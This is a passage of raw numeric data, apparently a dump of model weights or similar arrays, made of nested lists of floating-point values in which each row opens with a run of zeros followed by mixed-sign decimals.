0.0074, -0.10675, 0.2156, -0.1003, 0.00862, 0.4424, 0.3274, 0.03458, 0.0836, -0.1057, 0.06854, -0.1537, 0.5464, 0.01657, -0.1724, 0.05197, -0.01024, -0.2141, -0.364, -0.03055, -0.4055, 0.0401, 0.7163, -0.0142, -0.1278, -0.1698, 0.00784, 0.0831, -0.3376, -0.2401, 0.1571, 0.02176, 0.07336, 0.00929, 0.0824, 0.0293, 0.0387], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.475, -1.208, -0.533, -0.0924, 2.523, -0.9453, 1.172, 0.1984, -0.2617, 0.4834, -0.601, -0.09906, 0.575, -0.8286, -0.5156, 1.239, -0.646, 1.268, 2.291, 0.2524, 0.2688, 0.8423, -0.1832, 0.1503, 0.2546, -0.0738, -0.1984, 0.2905, -0.1494, -0.2189, -0.3745, -4.902, -0.0782, -0.6323, 0.407, -0.482, 0.10565, -0.6284, -0.1682, 0.6665, 0.7773, 0.533, 0.4692, 1.291, -1.132, 0.0212, 0.6196, -7.746, -0.1057, 3.24], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.009514, -0.00195, 0.02892, -0.0821, 0.3271, 0.05054, -9.72, 0.00551, 0.0623, -0.05722, -0.1973, 0.03238, -0.04428, 
-0.001432, 0.0006013, 0.1189, 0.01414, 0.1086, -0.01479, 0.1913, -0.05603, 0.0698, 0.0638, 0.005184, 0.01241, 0.05875, -0.00409, -0.05197, -0.01663, 0.02109, -0.1965, 0.0853, 0.000946, 0.04462, -0.0845, -0.312, -0.0002444, -0.0318, -0.0343, -0.01305, 0.05316, -0.2117, -0.0556, -0.01926, -4.242, 0.04483, -0.1431, 0.0922, -0.02545, 0.0659], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9355, -2.014, 0.253, -0.0539, -0.4497, 0.9443, -0.3945, -0.4182, -0.858, -0.2383, 0.1486, 3.34, -0.3845, -0.1528, 0.05643, -1.657, -1.352, -0.9824, -1.024, 0.1622, 0.2151, -0.02487, -7.45, 0.2136, 0.07025, -2.467, -5.188, 0.442, 0.001036, 0.4019, 0.4026, -1.795, -0.3604, 0.9673, -2.395, 0.01895, 0.1142, -0.3066, 1.185, -0.962, -0.57, 1.079, -1.909, 1.78, 0.1116, -0.4368, -7.0, -0.744, -0.0401, 0.8325], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2018, 0.252, -0.49, -0.02803, 0.5396, 0.06793, -0.219, -0.01023, 0.1417, 0.299, -0.0814, 0.3474, 0.2406, -0.0173, -0.2014, -0.2961, -0.0098, -0.1339, 0.1334, 0.479, 0.0488, -0.0827, -0.00103, -0.1825, -0.0829, 0.07697, 0.0746, 0.1506, -0.02783, -0.01852, 0.1635, -0.0303, -0.0721, 0.1653, 0.221, 0.303, 0.005074, 0.09753, -0.006256, 0.0007334, 0.1382, -0.3262, 0.5327, -0.4429, 0.05582, 0.05585, -1.686, 0.0455, -0.010796, 0.209], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0667, -0.02539, 0.3086, 0.03384, 0.3318, 0.0974, -2.076, 
-0.2015, 0.1309, -0.184, 0.007423, 0.529, 0.1295, 0.05188, -0.1365, 0.1396, -0.1519, 0.0619, -0.3987, -0.472, -0.01156, 0.07336, 0.4512, -0.07404, 0.4744, 0.0213, 0.1669, -0.1973, -0.04654, 0.1782, -0.2273, -0.04538, -0.1225, -0.065, -0.1467, -0.0821, 0.01364, 0.1544, 0.1587, -0.2825, -0.07324, -1.45, -0.03363, -0.099, -0.3496, -0.00941, -0.0986, 0.02112, 0.05988, -4.293], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -5.004, 0.196, 0.07153, -0.04648, -0.572, -0.608, -3.727, -2.355, -0.010704, -0.01023, -0.1628, -0.1698, 0.2664, 0.3225, 0.3948, -0.000819, -0.1403, 0.1284, 0.4465, 0.2935, 0.0226, 0.06165, -0.1982, -1.236, 0.01174, -0.483, 0.3347, -0.1196, -0.1938, -0.1616, -0.1902, 0.0834, -0.06305, -0.2207, -0.05173, -0.08746, -0.1384, 0.001771, -0.4353, 0.2878, 0.2998, -0.41, 0.2051, 0.3682, -0.03116, -0.2375, 0.2944, -0.0546, -0.03053, 0.1881], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2302, 0.2576, 0.05588, -0.1293, 0.1244, -0.1531, -13.555, -0.018, -0.1683, -0.0382, -0.2424, -0.1019, 0.06335, 0.01927, -0.09546, 0.04642, -0.05634, 0.02881, 0.2874, -0.01979, -0.05145, 0.3525, 0.03116, 0.0527, 0.0776, -0.0846, 0.11035, 0.0709, -0.1102, -0.002838, 0.05026, 0.02516, -0.02945, -0.0741, 0.03047, 0.4866, -0.05264, 0.00238, -0.2905, 0.0718, 0.1504, 0.368, -0.0125, 0.2634, -0.05472, -0.08136, 0.3052, 0.1083, 0.01648, 0.1698], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, -0.2756, -0.21, -0.144, 0.01741, -0.2632, -0.006763, -0.1412, 0.01509, -0.0187, 0.0826, -0.00743, -0.22, 0.0832, 0.06793, 0.00959, -0.03342, -0.03976, 0.10706, -0.2394, -0.04102, 0.01764, -0.1154, 0.05667, 0.007866, -0.1954, -0.5264, 0.1207, -0.0675, -0.00944, 0.0225, -0.05457, 0.635, 0.02559, -0.1675, 0.0519, 0.4355, -0.01955, 0.04065, -0.03036, 0.0326, 0.1, -0.11694, -0.0171, 0.2169, -0.2323, 0.08606, -0.0496, -0.09827, 0.02342, 0.003796], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2727, 0.829, -3.9, -2.104, -5.105, -8.75, 0.04657, -0.5347, 0.4873, 0.21, 0.7837, 0.1399, -3.03, 1.837, -1.022, 2.926, -0.8193, -2.385, 0.345, -0.043, 0.6035, 1.83, 5.027, -0.0811, 2.887, -6.586, -5.555, 1.202, 0.5845, 1.642, 0.8237, -20.1, -3.365, -0.11884, 3.162, 0.452, -1.206, -9.21, 2.936, -0.1407, -2.557, 2.592, -1.89, 0.887, -0.173, -0.828, 0.10266, -3.031, 0.3657, -0.093], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.06793, -0.1959, 0.1696, -0.2463, 1.019, 0.1231, -0.3608, -0.04684, 0.00336, 0.01978, -0.32, -0.2162, -0.10004, -0.0789, -1.537, 0.01758, 0.02878, -0.3098, 0.2433, 0.08136, -0.506, 0.3208, 0.1719, 0.1681, 0.204, -0.00421, -0.07825, 0.03026, -0.4187, -0.02205, 0.0872, -0.493, 0.0349, -0.3386, -0.001558, 0.863, -0.2927, -0.0421, -0.1488, 0.076, 0.1279, -0.3005, -0.08575, 0.3228, 0.09174, 0.0658, 0.3918, -0.1207, -0.1993, -0.05246], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2185, 0.0964, 0.2698, -0.04163, 0.809, 0.2698, -0.3137, -0.1963, -0.146, -0.07465, -0.1371, -0.2289, 0.156, -0.2507, 0.421, 0.2876, 0.1613, 0.01978, -0.1318, 0.4236, -0.1858, 0.286, 0.1633, 0.1284, -0.05188, -0.10516, 0.01319, -0.138, -0.0311, 0.12476, 0.1295, 0.141, -0.02057, -0.1603, 0.05704, -0.2688, -0.2242, 0.07404, -0.1267, 0.02945, 0.0348, 0.06183, -0.00632, 0.2964, -0.06006, 0.01627, 0.3806, -0.0641, -0.0622, 0.0971], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04364, -0.02982, -0.1499, -0.1131, 0.0849, 0.08264, -1.935, -0.03018, 0.1107, 0.1678, -0.3071, -0.3955, 0.03014, 0.1036, -11.05, -0.0343, -0.11414, -0.2134, 0.9775, -0.05182, -0.236, -0.04596, 0.506, -0.01848, -0.3376, -0.3242, 0.1755, 0.07434, -0.0524, -3.146, -0.1285, -0.1207, -0.03056, 0.11633, -0.0628, 0.6587, -0.09235, -0.03827, 0.01183, 0.03482, -0.3574, -1.033, -0.02902, 0.0732, -0.2128, -0.01427, -0.1021, 0.03043, -0.7153, 0.4365], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.683, -0.1708, -0.3193, 0.11896, 1.969, 0.4097, -3.361, 0.0644, -6.664, -0.5146, 0.2969, 0.2208, -1.8545, 0.2037, 1.338, 0.522, -0.02028, 0.2744, 0.9326, 0.5977, -0.6216, -0.01994, -0.142, 0.579, 0.867, 0.7163, 0.2585, -0.09937, -0.4988, -0.2656, -0.9077, -0.7764, -0.323, -1.303, 1.084, -2.47, -0.2778, -6.48, -1.662, 0.1299, 0.3958, 0.5435, 0.4658, 2.227, -0.04822, -0.0865, 0.4856, 1.08, 0.0086, 0.3508], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1392, 0.1793, -0.2944, -0.008026, -4.32, 0.05872, -0.4868, -0.02103, -0.1478, 0.2646, -0.3425, 0.005367, -0.172, -0.04877, -0.08624, 0.02672, -0.07983, 0.0879, -0.0985, 0.0659, -0.002989, -0.05215, -0.3186, 0.04184, 0.6025, -0.03366, -0.1941, 0.09186, -0.01991, -0.04755, 0.11414, 0.2744, -0.002031, 0.1365, -0.0403, -0.9443, -0.04083, -0.1823, -0.4265, 0.0831, 0.163, -0.0348, 0.05237, 0.295, -2.998, 0.03317, 0.02943, -0.0724, -0.1438, -4.984], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.003326, 0.3345, -0.04398, 0.01674, 0.1178, 0.0703, 0.6294, -0.03372, 0.0348, 0.07965, -0.03195, 0.2786, -0.02328, -0.0448, -0.0591, -0.0424, -0.0409, 0.0679, 0.07666, 0.314, 0.01126, 0.1053, -0.01697, -0.02646, -0.08167, 0.0382, 0.013596, -0.1511, 0.03702, 0.02979, -0.1236, -0.2515, -0.04202, -0.2705, 0.0712, 0.2131, 0.001465, -0.1317, -0.1016, -0.008934, 0.003933, 0.0757, -0.1964, -0.01446, 0.01463, 0.05652, 0.1411, -0.0311, -0.000726, -0.08966], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0433, 1.59, -0.667, -0.0918, 1.133, -0.7705, 0.02089, 0.71, -0.11725, 0.2612, -0.0209, -0.978, -0.1398, 0.4624, -0.2754, -0.2021, -0.0859, -2.4, -0.04614, 0.3855, -7.737e-05, -0.0666, 0.5234, -0.1625, 0.538, 0.9595, -0.637, 0.309, 0.1045, 0.04257, 0.61, -0.965, -0.4446, -0.6597, 0.622, 0.4058, -0.3481, 0.01326, -0.44, -1.244, -0.0843, 0.8496, -0.05383, 1.204, 0.1311, 0.133, -3.229, -0.3289, 0.00782, -0.2014], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.553, -0.603, 0.597, -1.005, -0.2576, -0.9165, -2.14, 0.1022, 0.2705, 0.3477, -0.12115, -3.95, -8.9, 0.3892, 0.382, -0.2517, -0.10004, 0.10913, 0.3328, 0.7075, -0.324, 0.4775, -8.805, -1.547, 0.5957, 0.4187, 1.044, -1.071, -6.598, -0.3098, 0.01718, 1.358, -0.796, -1.776, -5.69, 0.86, -1.815, 0.02066, -0.6064, -1.482, -0.1377, -1.154, 1.636, 0.444, -0.3096, -0.302, 2.01, -0.761, -0.10205, 0.2009], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0008926, -0.09875, -0.0635, 0.008995, -0.1725, -0.02606, -0.1907, -0.01826, -0.01985, -0.01732, -0.0405, -0.5454, -0.1003, 0.003286, 0.04007, -0.1396, 0.014175, -0.10913, 0.1117, 0.1359, -0.0296, 0.02309, 0.06107, -0.1035, 0.1034, -0.7383, 0.02287, -0.06143, -0.004845, -0.01421, 0.0676, -0.07837, 0.02148, 0.1095, 0.03955, -0.5806, -0.06216, -0.02258, -0.05878, 0.02858, 0.0438, 0.03757, -0.0604, -0.0651, -0.09595, 0.07654, 0.09375, 0.00784, -0.00269, -0.02516], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0633, -0.1106, -0.04807, -0.01782, -0.0834, -0.05743, -0.7505, -0.04385, -0.0504, -0.10675, 0.119, 0.4556, -0.0107, 0.00577, -0.003208, -0.06146, 0.04025, 0.03275, -0.1026, -0.1321, -0.00991, -0.00907, -0.11896, 0.06885, 0.12494, -0.1393, 0.06964, 0.06494, -0.0077, -0.02367, 0.2822, -0.0001906, 0.064, -0.06036, 0.01308, -0.3718, 0.0375, -0.04123, 0.0232, -0.0512, -0.04187, 0.2915, -0.04645, -0.2654, -0.01955, 0.066, -0.4011, -0.05557, 0.0002364, -0.0867], [0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -2.865, 1.2295, -1.333, -0.9907, -4.617, 0.1305, -0.7295, -0.433, -0.2195, -0.02489, 0.01068, -0.2786, 0.3022, 0.07007, 0.1974, 0.639, -0.1212, -1.618, -0.2756, 0.494, -0.01979, 0.000639, -2.281, -0.377, 0.344, 0.5674, 0.639, -0.03476, 0.02116, -1.619, -0.1985, 1.325, -0.0662, -2.803, -0.02159, -1.121, -0.1262, -0.2747, 0.1504, -1.444, -0.2666, 0.7466, 0.003874, -4.098, -0.3997, 0.06696, -0.7207, 0.0339, 0.06555, 0.1864], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.9795, 1.071, 0.784, -2.785, 2.488, -5.836, -0.3132, -2.787, 0.6685, -1.187, -0.3838, -6.67, -0.455, -0.6367, -0.6475, -0.06903, -0.1411, -0.2091, -0.794, 0.3328, -0.601, 0.5767, 0.3196, -10.0, 0.4563, -2.826, -0.367, 0.45, 0.1422, 0.06604, 0.6274, 3.676, -0.4614, -0.2556, 0.119, 0.9688, 0.00816, -4.73, -0.461, -0.00918, -0.2393, -0.1321, 1.534, 0.8833, -0.8057, 0.0771, 0.07635, -8.86, 0.08875, -0.413], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1537, -0.2874, 0.808, -0.629, 0.663, 0.2318, -0.2568, 0.03528, 0.2229, 1.187, -0.566, -0.06757, -0.1656, -0.1638, 0.2002, 0.024, -0.09607, 0.254, 0.7695, 0.7256, -0.0856, -0.2449, 1.196, -1.669, 0.2537, 0.1882, 0.398, 0.4604, -0.03513, 0.0682, -0.529, 0.5405, 0.1583, 0.323, -0.4343, 1.217, -0.2385, 0.1658, 0.1024, 0.08734, -0.0939, -2.86, -0.04712, -0.4792, -0.791, -0.3064, -0.8936, -0.03183, -0.0641, -2.262], [0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5317, 0.4402, -1.637, -0.04178, 0.1278, -0.052, -1.156, -0.1901, -0.0935, 0.2754, 0.00866, -4.39, -3.98, 0.0861, 0.1091, 0.2474, -0.1377, -0.02228, -0.266, -0.3042, -0.006554, 0.1501, 0.3525, -0.01089, 0.1144, 0.4631, 0.01695, -0.208, -0.0484, 0.1548, 0.248, -0.1844, -0.04736, -0.2515, 0.2842, 1.385, 0.01135, 0.1268, 0.6094, -0.3013, -0.04132, -0.6636, -0.7017, 0.08685, -0.2793, -0.1423, -0.3054, 0.06158, -0.01324, 0.0221], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.002304, 0.1486, -0.1285, -0.001797, -0.001637, 0.00534, -0.2148, 0.007416, 0.01365, -0.1967, -0.01191, 1.156, 0.01544, 0.01967, -0.005463, 0.0638, -0.02779, -0.0849, 0.254, 0.03723, 0.001042, -0.2583, -0.08746, 0.0011215, 0.1495, 0.01855, 0.01411, -0.002174, 0.0008655, -0.0917, -0.624, -0.006893, -0.1348, -0.006786, -0.03198, 0.2915, -0.002285, -0.00489, -0.004974, 0.00941, -0.1669, -1.069, 0.02266, -0.1168, -0.005135, -0.005642, 0.003952, 0.00686, -0.00241, -0.6987], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.04648, 0.5513, 0.3599, -0.0802, 0.591, -0.5444, -0.2585, -0.0758, -0.1001, 0.1048, -0.01729, 0.4578, -0.07196, 0.01779, -0.0435, 0.2235, -0.0094, -0.04175, 0.06244, 0.1392, 0.09186, 0.2947, -0.001559, 0.06866, 0.2354, 0.3003, 0.1174, 0.10175, 0.02158, 0.07544, -0.03726, -0.1407, -0.02856, -0.402, 0.12164, 0.4016, 0.0656, -0.0992, -0.4934, 
-0.0648, 0.1621, 0.468, -0.1163, 0.2803, 0.07214, -0.0447, -0.11664, -0.0952, -0.04648, -0.0836], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.081, -0.1375, -0.12354, -0.1251, 0.001401, 0.0877, -0.03204, -0.001706, -0.05444, -0.2238, 0.01222, -0.9297, -1.246, -0.3093, 0.04742, -1.327, -6.43e-05, -0.1707, 0.02112, 0.01441, 0.006714, 0.0526, -0.2363, -1.466, 0.02339, -0.3118, -0.04294, -0.1565, -0.03094, 0.0578, -1.095, -0.9893, -0.1963, -3.695, -0.3489, 0.1884, -0.6562, -0.3506, 0.015015, -0.001133, -0.05368, 0.1683, 0.1985, -0.1937, -0.0869, -0.06757, -3.213, -0.03108, -0.1366, 0.1951], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.9897, 4.074, 1.866, -1.903, -3.88, -1.009, 0.07434, 1.679, -0.4058, 0.5493, -1.431, 1.099, 1.093, -0.2388, 1.164, 0.8384, 0.388, -0.001986, 0.5337, -1.388, -0.628, -0.7197, 1.686, -0.9644, 1.435, 2.057, -0.9053, -0.591, 0.4424, -0.3306, 2.184, -0.07477, -0.0646, -1.466, 1.975, 1.958, -0.1664, 0.1846, 1.011, -0.3945, -0.4739, 2.727, 0.3862, -2.133, -0.8267, -1.383, -1.301, -0.1729, 1.219, -4.945], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 